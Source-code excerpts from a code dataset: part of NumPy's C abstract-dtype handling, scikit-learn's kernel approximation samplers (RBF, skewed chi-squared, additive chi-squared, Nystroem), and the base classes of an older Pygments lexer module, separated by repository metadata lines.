.flags = NPY_DT_ABSTRACT,
};
NPY_DType_Slots pycomplexdtype_slots = {
.discover_descr_from_pyobject = discover_descriptor_from_pycomplex,
.default_descr = complex_default_descriptor,
.common_dtype = complex_common_dtype,
};
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_PyComplexDType = {{{
PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
.tp_name = "numpy.dtypes._PyComplexDType",
.tp_base = NULL, /* set in initialize_and_map_pytypes_to_dtypes */
.tp_basicsize = sizeof(PyArray_Descr),
.tp_flags = Py_TPFLAGS_DEFAULT,
},},
.type_num = -1,
.dt_slots = &pycomplexdtype_slots,
.scalar_type = NULL, /* set in initialize_and_map_pytypes_to_dtypes */
};
/*
* Additional functions to deal with Python literal int, float, complex
*/
/*
* This function takes an existing array operand and if the new descr does
* not match, replaces it with a new array that has the correct descriptor
* and holds exactly the scalar value.
*/
NPY_NO_EXPORT int
npy_update_operand_for_scalar(
PyArrayObject **operand, PyObject *scalar, PyArray_Descr *descr,
NPY_CASTING casting)
{
if (PyArray_EquivTypes(PyArray_DESCR(*operand), descr)) {
/*
* TODO: This is an unfortunate work-around for legacy type resolvers
* (see `convert_ufunc_arguments` in `ufunc_object.c`), that
* currently forces us to replace the array.
*/
if (!(PyArray_FLAGS(*operand) & NPY_ARRAY_WAS_PYTHON_INT)) {
return 0;
}
}
else if (NPY_UNLIKELY(casting == NPY_EQUIV_CASTING) &&
descr->type_num != NPY_OBJECT) {
/*
* incredibly niche, but users could pass equiv casting and we
* actually need to cast. Let object pass (technically correct) but
* in all other cases, we don't technically consider equivalent.
* NOTE(seberg): I don't think we should be beholden to this logic.
*/
PyErr_Format(PyExc_TypeError,
"cannot cast Python %s to %S under the casting rule 'equiv'",
Py_TYPE(scalar)->tp_name, descr);
return -1;
}
Py_INCREF(descr);
PyArrayObject *new = (PyArrayObject *)PyArray_NewFromDescr(
&PyArray_Type, descr, 0, NULL, NULL, NULL, 0, NULL);
Py_SETREF(*operand, new);
if (*operand == NULL) {
return -1;
}
if (scalar == NULL) {
/* The ufunc.resolve_dtypes paths can go here. Anything should go. */
return 0;
}
return PyArray_SETITEM(new, PyArray_BYTES(*operand), scalar);
}
/*
* When a user passed a Python literal (int, float, complex), special promotion
* rules mean that we don't know the exact descriptor that should be used.
*
* Typically, this just doesn't really matter. Unfortunately, there are two
* exceptions:
* 1. The user might have passed `signature=` which may not be compatible.
* In that case, we cannot really assume "safe" casting.
* 2. It is at least fathomable that a DType doesn't deal with this directly.
* or that using the original int64/object is wrong in the type resolution.
*
* The solution is to assume that we can use the common DType of the signature
* and the Python scalar DType (`in_DT`) as a safe intermediate.
*/
NPY_NO_EXPORT PyArray_Descr *
npy_find_descr_for_scalar(
PyObject *scalar, PyArray_Descr *original_descr,
PyArray_DTypeMeta *in_DT, PyArray_DTypeMeta *op_DT)
{
PyArray_Descr *res;
/* There is a good chance, descriptors already match... */
if (NPY_DTYPE(original_descr) == op_DT) {
Py_INCREF(original_descr);
return original_descr;
}
PyArray_DTypeMeta *common = PyArray_CommonDType(in_DT, op_DT);
if (common == NULL) {
PyErr_Clear();
/* This is fine. We simply assume the original descr is viable. */
Py_INCREF(original_descr);
return original_descr;
}
/* A very likely case is that there is nothing to do: */
if (NPY_DTYPE(original_descr) == common) {
Py_DECREF(common);
Py_INCREF(original_descr);
return original_descr;
}
if (!NPY_DT_is_parametric(common) ||
/* In some paths we only have a scalar type, can't discover */
scalar == NULL ||
/* If the DType doesn't know the scalar type, guess at default. */
!NPY_DT_CALL_is_known_scalar_type(common, Py_TYPE(scalar))) {
if (common->singleton != NULL) {
res = common->singleton;
Py_INCREF(res);
}
else {
res = NPY_DT_CALL_default_descr(common);
}
}
else {
res = NPY_DT_CALL_discover_descr_from_pyobject(common, scalar);
}
Py_DECREF(common);
return res;
} | c | github | https://github.com/numpy/numpy | numpy/_core/src/multiarray/abstractdtypes.c |
"""
The :mod:`sklearn.kernel_approximation` module implements several
approximate kernel feature maps base on Fourier transforms.
"""
# Author: Andreas Mueller <amueller@ais.uni-bonn.de>
#
# License: BSD 3 clause
import warnings
import numpy as np
import scipy.sparse as sp
from scipy.linalg import svd
from .base import BaseEstimator
from .base import TransformerMixin
from .utils import check_array, check_random_state, as_float_array
from .utils.extmath import safe_sparse_dot
from .utils.validation import check_is_fitted
from .metrics.pairwise import pairwise_kernels
class RBFSampler(BaseEstimator, TransformerMixin):
"""Approximates feature map of an RBF kernel by Monte Carlo approximation
of its Fourier transform.
It implements a variant of Random Kitchen Sinks.[1]
Read more in the :ref:`User Guide <rbf_kernel_approx>`.
Parameters
----------
gamma : float
Parameter of RBF kernel: exp(-gamma * x^2)
n_components : int
Number of Monte Carlo samples per original feature.
Equals the dimensionality of the computed feature space.
random_state : {int, RandomState}, optional
If int, random_state is the seed used by the random number generator;
if RandomState instance, random_state is the random number generator.
Notes
-----
See "Random Features for Large-Scale Kernel Machines" by A. Rahimi and
Benjamin Recht.
[1] "Weighted Sums of Random Kitchen Sinks: Replacing
minimization with randomization in learning" by A. Rahimi and
Benjamin Recht.
(http://people.eecs.berkeley.edu/~brecht/papers/08.rah.rec.nips.pdf)
"""
def __init__(self, gamma=1., n_components=100, random_state=None):
self.gamma = gamma
self.n_components = n_components
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model with X.
Samples random projection according to n_features.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the transformer.
"""
X = check_array(X, accept_sparse='csr')
random_state = check_random_state(self.random_state)
n_features = X.shape[1]
self.random_weights_ = (np.sqrt(2 * self.gamma) * random_state.normal(
size=(n_features, self.n_components)))
self.random_offset_ = random_state.uniform(0, 2 * np.pi,
size=self.n_components)
return self
def transform(self, X, y=None):
"""Apply the approximate feature map to X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'random_weights_')
X = check_array(X, accept_sparse='csr')
projection = safe_sparse_dot(X, self.random_weights_)
projection += self.random_offset_
np.cos(projection, projection)
projection *= np.sqrt(2.) / np.sqrt(self.n_components)
return projection
class SkewedChi2Sampler(BaseEstimator, TransformerMixin):
"""Approximates feature map of the "skewed chi-squared" kernel by Monte
Carlo approximation of its Fourier transform.
Read more in the :ref:`User Guide <skewed_chi_kernel_approx>`.
Parameters
----------
skewedness : float
"skewedness" parameter of the kernel. Needs to be cross-validated.
n_components : int
number of Monte Carlo samples per original feature.
Equals the dimensionality of the computed feature space.
random_state : {int, RandomState}, optional
If int, random_state is the seed used by the random number generator;
if RandomState instance, random_state is the random number generator.
References
----------
See "Random Fourier Approximations for Skewed Multiplicative Histogram
Kernels" by Fuxin Li, Catalin Ionescu and Cristian Sminchisescu.
See also
--------
AdditiveChi2Sampler : A different approach for approximating an additive
variant of the chi squared kernel.
sklearn.metrics.pairwise.chi2_kernel : The exact chi squared kernel.
"""
def __init__(self, skewedness=1., n_components=100, random_state=None):
self.skewedness = skewedness
self.n_components = n_components
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model with X.
Samples random projection according to n_features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the transformer.
"""
X = check_array(X)
random_state = check_random_state(self.random_state)
n_features = X.shape[1]
uniform = random_state.uniform(size=(n_features, self.n_components))
# transform by inverse CDF of sech
self.random_weights_ = (1. / np.pi
* np.log(np.tan(np.pi / 2. * uniform)))
self.random_offset_ = random_state.uniform(0, 2 * np.pi,
size=self.n_components)
return self
def transform(self, X, y=None):
"""Apply the approximate feature map to X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'random_weights_')
X = as_float_array(X, copy=True)
X = check_array(X, copy=False)
if (X < 0).any():
raise ValueError("X may not contain entries smaller than zero.")
X += self.skewedness
np.log(X, X)
projection = safe_sparse_dot(X, self.random_weights_)
projection += self.random_offset_
np.cos(projection, projection)
projection *= np.sqrt(2.) / np.sqrt(self.n_components)
return projection
class AdditiveChi2Sampler(BaseEstimator, TransformerMixin):
"""Approximate feature map for additive chi2 kernel.
Uses sampling the fourier transform of the kernel characteristic
at regular intervals.
Since the kernel that is to be approximated is additive, the components of
the input vectors can be treated separately. Each entry in the original
space is transformed into 2*sample_steps+1 features, where sample_steps is
a parameter of the method. Typical values of sample_steps include 1, 2 and
3.
Optimal choices for the sampling interval for certain data ranges can be
computed (see the reference). The default values should be reasonable.
Read more in the :ref:`User Guide <additive_chi_kernel_approx>`.
Parameters
----------
sample_steps : int, optional
Gives the number of (complex) sampling points.
sample_interval : float, optional
Sampling interval. Must be specified when sample_steps not in {1,2,3}.
Notes
-----
This estimator approximates a slightly different version of the additive
chi squared kernel then ``metric.additive_chi2`` computes.
See also
--------
SkewedChi2Sampler : A Fourier-approximation to a non-additive variant of
the chi squared kernel.
sklearn.metrics.pairwise.chi2_kernel : The exact chi squared kernel.
sklearn.metrics.pairwise.additive_chi2_kernel : The exact additive chi
squared kernel.
References
----------
See `"Efficient additive kernels via explicit feature maps"
<http://www.robots.ox.ac.uk/~vedaldi/assets/pubs/vedaldi11efficient.pdf>`_
A. Vedaldi and A. Zisserman, Pattern Analysis and Machine Intelligence,
2011
"""
def __init__(self, sample_steps=2, sample_interval=None):
self.sample_steps = sample_steps
self.sample_interval = sample_interval
def fit(self, X, y=None):
"""Set parameters."""
X = check_array(X, accept_sparse='csr')
if self.sample_interval is None:
# See reference, figure 2 c)
if self.sample_steps == 1:
self.sample_interval_ = 0.8
elif self.sample_steps == 2:
self.sample_interval_ = 0.5
elif self.sample_steps == 3:
self.sample_interval_ = 0.4
else:
raise ValueError("If sample_steps is not in [1, 2, 3],"
" you need to provide sample_interval")
else:
self.sample_interval_ = self.sample_interval
return self
def transform(self, X, y=None):
"""Apply approximate feature map to X.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Returns
-------
X_new : {array, sparse matrix}, \
shape = (n_samples, n_features * (2*sample_steps + 1))
Whether the return value is an array of sparse matrix depends on
the type of the input X.
"""
msg = ("%(name)s is not fitted. Call fit to set the parameters before"
" calling transform")
check_is_fitted(self, "sample_interval_", msg=msg)
X = check_array(X, accept_sparse='csr')
sparse = sp.issparse(X)
# check if X has negative values. Doesn't play well with np.log.
if ((X.data if sparse else X) < 0).any():
raise ValueError("Entries of X must be non-negative.")
# zeroth component
# 1/cosh = sech
# cosh(0) = 1.0
transf = self._transform_sparse if sparse else self._transform_dense
return transf(X)
def _transform_dense(self, X):
non_zero = (X != 0.0)
X_nz = X[non_zero]
X_step = np.zeros_like(X)
X_step[non_zero] = np.sqrt(X_nz * self.sample_interval_)
X_new = [X_step]
log_step_nz = self.sample_interval_ * np.log(X_nz)
step_nz = 2 * X_nz * self.sample_interval_
for j in range(1, self.sample_steps):
factor_nz = np.sqrt(step_nz /
np.cosh(np.pi * j * self.sample_interval_))
X_step = np.zeros_like(X)
X_step[non_zero] = factor_nz * np.cos(j * log_step_nz)
X_new.append(X_step)
X_step = np.zeros_like(X)
X_step[non_zero] = factor_nz * np.sin(j * log_step_nz)
X_new.append(X_step)
return np.hstack(X_new)
def _transform_sparse(self, X):
indices = X.indices.copy()
indptr = X.indptr.copy()
data_step = np.sqrt(X.data * self.sample_interval_)
X_step = sp.csr_matrix((data_step, indices, indptr),
shape=X.shape, dtype=X.dtype, copy=False)
X_new = [X_step]
log_step_nz = self.sample_interval_ * np.log(X.data)
step_nz = 2 * X.data * self.sample_interval_
for j in range(1, self.sample_steps):
factor_nz = np.sqrt(step_nz /
np.cosh(np.pi * j * self.sample_interval_))
data_step = factor_nz * np.cos(j * log_step_nz)
X_step = sp.csr_matrix((data_step, indices, indptr),
shape=X.shape, dtype=X.dtype, copy=False)
X_new.append(X_step)
data_step = factor_nz * np.sin(j * log_step_nz)
X_step = sp.csr_matrix((data_step, indices, indptr),
shape=X.shape, dtype=X.dtype, copy=False)
X_new.append(X_step)
return sp.hstack(X_new)
class Nystroem(BaseEstimator, TransformerMixin):
"""Approximate a kernel map using a subset of the training data.
Constructs an approximate feature map for an arbitrary kernel
using a subset of the data as basis.
Read more in the :ref:`User Guide <nystroem_kernel_approx>`.
Parameters
----------
kernel : string or callable, default="rbf"
Kernel map to be approximated. A callable should accept two arguments
and the keyword arguments passed to this object as kernel_params, and
should return a floating point number.
n_components : int
Number of features to construct.
How many data points will be used to construct the mapping.
gamma : float, default=None
Gamma parameter for the RBF, polynomial, exponential chi2 and
sigmoid kernels. Interpretation of the default value is left to
the kernel; see the documentation for sklearn.metrics.pairwise.
Ignored by other kernels.
degree : float, default=3
Degree of the polynomial kernel. Ignored by other kernels.
coef0 : float, default=1
Zero coefficient for polynomial and sigmoid kernels.
Ignored by other kernels.
kernel_params : mapping of string to any, optional
Additional parameters (keyword arguments) for kernel function passed
as callable object.
random_state : {int, RandomState}, optional
If int, random_state is the seed used by the random number generator;
if RandomState instance, random_state is the random number generator.
Attributes
----------
components_ : array, shape (n_components, n_features)
Subset of training points used to construct the feature map.
component_indices_ : array, shape (n_components)
Indices of ``components_`` in the training set.
normalization_ : array, shape (n_components, n_components)
Normalization matrix needed for embedding.
Square root of the kernel matrix on ``components_``.
References
----------
* Williams, C.K.I. and Seeger, M.
"Using the Nystroem method to speed up kernel machines",
Advances in neural information processing systems 2001
* T. Yang, Y. Li, M. Mahdavi, R. Jin and Z. Zhou
"Nystroem Method vs Random Fourier Features: A Theoretical and Empirical
Comparison",
Advances in Neural Information Processing Systems 2012
See also
--------
RBFSampler : An approximation to the RBF kernel using random Fourier
features.
sklearn.metrics.pairwise.kernel_metrics : List of built-in kernels.
"""
def __init__(self, kernel="rbf", gamma=None, coef0=1, degree=3,
kernel_params=None, n_components=100, random_state=None):
self.kernel = kernel
self.gamma = gamma
self.coef0 = coef0
self.degree = degree
self.kernel_params = kernel_params
self.n_components = n_components
self.random_state = random_state
def fit(self, X, y=None):
"""Fit estimator to data.
Samples a subset of training points, computes kernel
on these and computes normalization matrix.
Parameters
----------
X : array-like, shape=(n_samples, n_feature)
Training data.
"""
X = check_array(X, accept_sparse='csr')
rnd = check_random_state(self.random_state)
n_samples = X.shape[0]
# get basis vectors
if self.n_components > n_samples:
# XXX should we just bail?
n_components = n_samples
warnings.warn("n_components > n_samples. This is not possible.\n"
"n_components was set to n_samples, which results"
" in inefficient evaluation of the full kernel.")
else:
n_components = self.n_components
n_components = min(n_samples, n_components)
inds = rnd.permutation(n_samples)
basis_inds = inds[:n_components]
basis = X[basis_inds]
basis_kernel = pairwise_kernels(basis, metric=self.kernel,
filter_params=True,
**self._get_kernel_params())
# sqrt of kernel matrix on basis vectors
U, S, V = svd(basis_kernel)
S = np.maximum(S, 1e-12)
self.normalization_ = np.dot(U * 1. / np.sqrt(S), V)
self.components_ = basis
self.component_indices_ = inds
return self
def transform(self, X):
"""Apply feature map to X.
Computes an approximate feature map using the kernel
between some training points and X.
Parameters
----------
X : array-like, shape=(n_samples, n_features)
Data to transform.
Returns
-------
X_transformed : array, shape=(n_samples, n_components)
Transformed data.
"""
check_is_fitted(self, 'components_')
X = check_array(X, accept_sparse='csr')
kernel_params = self._get_kernel_params()
embedded = pairwise_kernels(X, self.components_,
metric=self.kernel,
filter_params=True,
**kernel_params)
return np.dot(embedded, self.normalization_.T)
def _get_kernel_params(self):
params = self.kernel_params
if params is None:
params = {}
if not callable(self.kernel):
params['gamma'] = self.gamma
params['degree'] = self.degree
params['coef0'] = self.coef0
return params | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
pygments.lexer
~~~~~~~~~~~~~~
Base lexer classes.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re, itertools
from pygments.filter import apply_filters, Filter
from pygments.filters import get_filter_by_name
from pygments.token import Error, Text, Other, _TokenType
from pygments.util import get_bool_opt, get_int_opt, get_list_opt, \
make_analysator
__all__ = ['Lexer', 'RegexLexer', 'ExtendedRegexLexer', 'DelegatingLexer',
'LexerContext', 'include', 'inherit', 'bygroups', 'using', 'this']
_encoding_map = [('\xef\xbb\xbf', 'utf-8'),
('\xff\xfe\0\0', 'utf-32'),
('\0\0\xfe\xff', 'utf-32be'),
('\xff\xfe', 'utf-16'),
('\xfe\xff', 'utf-16be')]
_default_analyse = staticmethod(lambda x: 0.0)
class LexerMeta(type):
"""
This metaclass automagically converts ``analyse_text`` methods into
static methods which always return float values.
"""
def __new__(cls, name, bases, d):
if 'analyse_text' in d:
d['analyse_text'] = make_analysator(d['analyse_text'])
return type.__new__(cls, name, bases, d)
class Lexer(object):
"""
Lexer for a specific language.
Basic options recognized:
``stripnl``
Strip leading and trailing newlines from the input (default: True).
``stripall``
Strip all leading and trailing whitespace from the input
(default: False).
``ensurenl``
Make sure that the input ends with a newline (default: True). This
is required for some lexers that consume input linewise.
*New in Pygments 1.3.*
``tabsize``
If given and greater than 0, expand tabs in the input (default: 0).
``encoding``
If given, must be an encoding name. This encoding will be used to
convert the input string to Unicode, if it is not already a Unicode
string (default: ``'latin1'``).
Can also be ``'guess'`` to use a simple UTF-8 / Latin1 detection, or
``'chardet'`` to use the chardet library, if it is installed.
"""
#: Name of the lexer
name = None
#: Shortcuts for the lexer
aliases = []
#: File name globs
filenames = []
#: Secondary file name globs
alias_filenames = []
#: MIME types
mimetypes = []
#: Priority, should multiple lexers match and no content is provided
priority = 0
__metaclass__ = LexerMeta
def __init__(self, **options):
self.options = options
self.stripnl = get_bool_opt(options, 'stripnl', True)
self.stripall = get_bool_opt(options, 'stripall', False)
self.ensurenl = get_bool_opt(options, 'ensurenl', True)
self.tabsize = get_int_opt(options, 'tabsize', 0)
self.encoding = options.get('encoding', 'latin1')
# self.encoding = options.get('inencoding', None) or self.encoding
self.filters = []
for filter_ in get_list_opt(options, 'filters', ()):
self.add_filter(filter_)
def __repr__(self):
if self.options:
return '<pygments.lexers.%s with %r>' % (self.__class__.__name__,
self.options)
else:
return '<pygments.lexers.%s>' % self.__class__.__name__
def add_filter(self, filter_, **options):
"""
Add a new stream filter to this lexer.
"""
if not isinstance(filter_, Filter):
filter_ = get_filter_by_name(filter_, **options)
self.filters.append(filter_)
def analyse_text(text):
"""
Has to return a float between ``0`` and ``1`` that indicates
if a lexer wants to highlight this text. Used by ``guess_lexer``.
If this method returns ``0`` it won't highlight it in any case, if
it returns ``1`` highlighting with this lexer is guaranteed.
The `LexerMeta` metaclass automatically wraps this function so
that it works like a static method (no ``self`` or ``cls``
parameter) and the return value is automatically converted to
`float`. If the return value is an object that is boolean `False`
it's the same as if the return values was ``0.0``.
"""
def get_tokens(self, text, unfiltered=False):
"""
Return an iterable of (tokentype, value) pairs generated from
`text`. If `unfiltered` is set to `True`, the filtering mechanism
is bypassed even if filters are defined.
Also preprocess the text, i.e. expand tabs and strip it if
wanted and applies registered filters.
"""
if not isinstance(text, unicode):
if self.encoding == 'guess':
try:
text = text.decode('utf-8')
if text.startswith(u'\ufeff'):
text = text[len(u'\ufeff'):]
except UnicodeDecodeError:
text = text.decode('latin1')
elif self.encoding == 'chardet':
try:
import chardet
except ImportError:
raise ImportError('To enable chardet encoding guessing, '
'please install the chardet library '
'from http://chardet.feedparser.org/')
# check for BOM first
decoded = None
for bom, encoding in _encoding_map:
if text.startswith(bom):
decoded = unicode(text[len(bom):], encoding,
errors='replace')
break
# no BOM found, so use chardet
if decoded is None:
enc = chardet.detect(text[:1024]) # Guess using first 1KB
decoded = unicode(text, enc.get('encoding') or 'utf-8',
errors='replace')
text = decoded
else:
text = text.decode(self.encoding)
else:
if text.startswith(u'\ufeff'):
text = text[len(u'\ufeff'):]
# text now *is* a unicode string
text = text.replace('\r\n', '\n')
text = text.replace('\r', '\n')
if self.stripall:
text = text.strip()
elif self.stripnl:
text = text.strip('\n')
if self.tabsize > 0:
text = text.expandtabs(self.tabsize)
if self.ensurenl and not text.endswith('\n'):
text += '\n'
def streamer():
for i, t, v in self.get_tokens_unprocessed(text):
yield t, v
stream = streamer()
if not unfiltered:
stream = apply_filters(stream, self.filters, self)
return stream
def get_tokens_unprocessed(self, text):
"""
Return an iterable of (tokentype, value) pairs.
In subclasses, implement this method as a generator to
maximize effectiveness.
"""
raise NotImplementedError
class DelegatingLexer(Lexer):
"""
This lexer takes two lexer as arguments. A root lexer and
a language lexer. First everything is scanned using the language
lexer, afterwards all ``Other`` tokens are lexed using the root
lexer.
The lexers from the ``template`` lexer package use this base lexer.
"""
def __init__(self, _root_lexer, _language_lexer, _needle=Other, **options):
self.root_lexer = _root_lexer(**options)
self.language_lexer = _language_lexer(**options)
self.needle = _needle
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buffered = ''
insertions = []
lng_buffer = []
for i, t, v in self.language_lexer.get_tokens_unprocessed(text):
if t is self.needle:
if lng_buffer:
insertions.append((len(buffered), lng_buffer))
lng_buffer = []
buffered += v
else:
lng_buffer.append((i, t, v))
if lng_buffer:
insertions.append((len(buffered), lng_buffer))
return do_insertions(insertions,
self.root_lexer.get_tokens_unprocessed(buffered))
#-------------------------------------------------------------------------------
# RegexLexer and ExtendedRegexLexer
#
class include(str):
"""
Indicates that a state should include rules from another state.
"""
pass
class _inherit(object):
"""
Indicates the a state should inherit from its superclass.
"""
def __repr__(self):
return 'inherit'
inherit = _inherit()
class combined(tuple):
"""
Indicates a state combined from multiple states.
"""
def __new__(cls, *args):
return tuple.__new__(cls, args)
def __init__(self, *args):
# tuple.__init__ doesn't do anything
pass
class _PseudoMatch(object):
"""
A pseudo match object constructed from a string.
"""
def __init__(self, start, text):
self._text = text
self._start = start
def start(self, arg=None):
return self._start
def end(self, arg=None):
return self._start + len(self._text)
def group(self, arg=None):
if arg:
raise IndexError('No such group')
return self._text
def groups(self):
return (self._text,)
def groupdict(self):
return {}
def bygroups(*args):
"""
Callback that yields multiple actions for each group in the match.
"""
def callback(lexer, match, ctx=None):
for i, action in enumerate(args):
if action is None:
continue
elif type(action) is _TokenType:
data = match.group(i + 1)
if data:
yield match.start(i + 1), action, data
else:
data = match.group(i + 1)
if data is not None:
if ctx:
ctx.pos = match.start(i + 1)
for item in action(lexer, _PseudoMatch(match.start(i + 1),
data), ctx):
if item:
yield item
if ctx:
ctx.pos = match.end()
return callback
class _This(object):
"""
Special singleton used for indicating the caller class.
Used by ``using``.
"""
this = _This()
def using(_other, **kwargs):
"""
Callback that processes the match with a different lexer.
The keyword arguments are forwarded to the lexer, except `state` which
is handled separately.
`state` specifies the state that the new lexer will start in, and can
be an enumerable such as ('root', 'inline', 'string') or a simple
string which is assumed to be on top of the root state.
Note: For that to work, `_other` must not be an `ExtendedRegexLexer`.
"""
gt_kwargs = {}
if 'state' in kwargs:
s = kwargs.pop('state')
if isinstance(s, (list, tuple)):
gt_kwargs['stack'] = s
else:
gt_kwargs['stack'] = ('root', s)
if _other is this:
def callback(lexer, match, ctx=None):
# if keyword arguments are given the callback
# function has to create a new lexer instance
if kwargs:
# XXX: cache that somehow
kwargs.update(lexer.options)
lx = lexer.__class__(**kwargs)
else:
lx = lexer
s = match.start()
for i, t, v in lx.get_tokens_unprocessed(match.group(), **gt_kwargs):
yield i + s, t, v
if ctx:
ctx.pos = match.end()
else:
def callback(lexer, match, ctx=None):
# XXX: cache that somehow
kwargs.update(lexer.options)
lx = _other(**kwargs)
s = match.start()
for i, t, v in lx.get_tokens_unprocessed(match.group(), **gt_kwargs):
yield i + s, t, v
if ctx:
ctx.pos = match.end()
return callback
class RegexLexerMeta(LexerMeta):
"""
Metaclass for RegexLexer, creates the self._tokens attribute from
self.tokens on the first instantiation.
"""
def _process_regex(cls, regex, rflags):
"""Preprocess the regular expression component of a token definition."""
return re.compile(regex, rflags).match
def _process_token(cls, token):
"""Preprocess the token component of a token definition."""
assert type(token) is _TokenType or callable(token), \
'token type must be simple type or callable, not %r' % (token,)
return token
def _process_new_state(cls, new_state, unprocessed, processed):
"""Preprocess the state transition action of a token definition."""
if isinstance(new_state, str):
# an existing state
if new_state == '#pop':
return -1
elif new_state in unprocessed:
return (new_state,)
elif new_state == '#push':
return new_state
elif new_state[:5] == '#pop:':
return -int(new_state[5:])
else:
assert False, 'unknown new state %r' % new_state
elif isinstance(new_state, combined):
# combine a new state from existing ones
tmp_state = '_tmp_%d' % cls._tmpname
cls._tmpname += 1
itokens = []
for istate in new_state:
assert istate != new_state, 'circular state ref %r' % istate
itokens.extend(cls._process_state(unprocessed,
processed, istate))
processed[tmp_state] = itokens
return (tmp_state,)
elif isinstance(new_state, tuple):
# push more than one state
for istate in new_state:
assert (istate in unprocessed or
istate in ('#pop', '#push')), \
'unknown new state ' + istate
return new_state
else:
assert False, 'unknown new state def %r' % new_state
def _process_state(cls, unprocessed, processed, state):
"""Preprocess a single state definition."""
assert type(state) is str, "wrong state name %r" % state
assert state[0] != '#', "invalid state name %r" % state
if state in processed:
return processed[state]
tokens = processed[state] = []
rflags = cls.flags
for tdef in unprocessed[state]:
if isinstance(tdef, include):
# it's a state reference
assert tdef != state, "circular state reference %r" % state
tokens.extend(cls._process_state(unprocessed, processed,
str(tdef)))
continue
if isinstance(tdef, _inherit):
# processed already
continue
assert type(tdef) is tuple, "wrong rule def %r" % tdef
try:
rex = cls._process_regex(tdef[0], rflags)
except Exception, err:
raise ValueError("uncompilable regex %r in state %r of %r: %s" %
(tdef[0], state, cls, err))
token = cls._process_token(tdef[1])
if len(tdef) == 2:
new_state = None
else:
new_state = cls._process_new_state(tdef[2],
unprocessed, processed)
tokens.append((rex, token, new_state))
return tokens
def process_tokendef(cls, name, tokendefs=None):
"""Preprocess a dictionary of token definitions."""
processed = cls._all_tokens[name] = {}
tokendefs = tokendefs or cls.tokens[name]
for state in tokendefs.keys():
cls._process_state(tokendefs, processed, state)
return processed
def get_tokendefs(cls):
"""
Merge tokens from superclasses in MRO order, returning a single tokendef
dictionary.
Any state that is not defined by a subclass will be inherited
automatically. States that *are* defined by subclasses will, by
default, override that state in the superclass. If a subclass wishes to
inherit definitions from a superclass, it can use the special value
"inherit", which will cause the superclass' state definition to be
included at that point in the state.
"""
tokens = {}
inheritable = {}
for c in itertools.chain((cls,), cls.__mro__):
toks = c.__dict__.get('tokens', {})
for state, items in toks.iteritems():
curitems = tokens.get(state)
if curitems is None:
tokens[state] = items
try:
inherit_ndx = items.index(inherit)
except ValueError:
continue
inheritable[state] = inherit_ndx
continue
inherit_ndx = inheritable.pop(state, None)
if inherit_ndx is None:
continue
# Replace the "inherit" value with the items
curitems[inherit_ndx:inherit_ndx+1] = items
try:
new_inh_ndx = items.index(inherit)
except ValueError:
pass
else:
inheritable[state] = inherit_ndx + new_inh_ndx
return tokens
def __call__(cls, *args, **kwds):
"""Instantiate cls after preprocessing its token definitions."""
if '_tokens' not in cls.__dict__:
cls._all_tokens = {}
cls._tmpname = 0
if hasattr(cls, 'token_variants') and cls.token_variants:
# don't process yet
pass
else:
cls._tokens = cls.process_tokendef('', cls.get_tokendefs())
return type.__call__(cls, *args, **kwds)
class RegexLexer(Lexer):
"""
Base for simple stateful regular expression-based lexers.
Simplifies the lexing process so that you need only
provide a list of states and regular expressions.
"""
__metaclass__ = RegexLexerMeta
#: Flags for compiling the regular expressions.
#: Defaults to MULTILINE.
flags = re.MULTILINE
#: Dict of ``{'state': [(regex, tokentype, new_state), ...], ...}``
#:
#: The initial state is 'root'.
#: ``new_state`` can be omitted to signify no state transition.
#: If it is a string, the state is pushed on the stack and changed.
#: If it is a tuple of strings, all states are pushed on the stack and
#: the current state will be the topmost.
#: It can also be ``combined('state1', 'state2', ...)``
#: to signify a new, anonymous state combined from the rules of two
#: or more existing ones.
#: Furthermore, it can be '#pop' to signify going back one step in
#: the state stack, or '#push' to push the current state on the stack
#: again.
#:
#: The tuple can also be replaced with ``include('state')``, in which
#: case the rules from the state named by the string are included in the
#: current one.
tokens = {}
def get_tokens_unprocessed(self, text, stack=('root',)):
"""
Split ``text`` into (tokentype, text) pairs.
``stack`` is the inital stack (default: ``['root']``)
"""
pos = 0
tokendefs = self._tokens
statestack = list(stack)
statetokens = tokendefs[statestack[-1]]
while 1:
for rexmatch, action, new_state in statetokens:
m = rexmatch(text, pos)
if m:
if type(action) is _TokenType:
yield pos, action, m.group()
else:
for item in action(self, m):
yield item
pos = m.end()
if new_state is not None:
# state transition
if isinstance(new_state, tuple):
for state in new_state:
if state == '#pop':
statestack.pop()
elif state == '#push':
statestack.append(statestack[-1])
else:
statestack.append(state)
elif isinstance(new_state, int):
# pop
del statestack[new_state:]
elif new_state == '#push':
statestack.append(statestack[-1])
else:
assert False, "wrong state def: %r" % new_state
statetokens = tokendefs[statestack[-1]]
break
else:
try:
if text[pos] == '\n':
# at EOL, reset state to "root"
statestack = ['root']
statetokens = tokendefs['root']
yield pos, Text, u'\n'
pos += 1
continue
yield pos, Error, text[pos]
pos += 1
except IndexError:
break
class LexerContext(object):
"""
A helper object that holds lexer position data.
"""
def __init__(self, text, pos, stack=None, end=None):
self.text = text
self.pos = pos
self.end = end or len(text) # end=0 not supported ;-)
self.stack = stack or ['root']
def __repr__(self):
return 'LexerContext(%r, %r, %r)' % (
self.text, self.pos, self.stack)
class ExtendedRegexLexer(RegexLexer):
"""
A RegexLexer that uses a context object to store its state.
"""
def get_tokens_unprocessed(self, text=None, context=None):
"""
Split ``text`` into (tokentype, text) pairs.
If ``context`` is given, use this lexer context instead.
"""
tokendefs = self._tokens
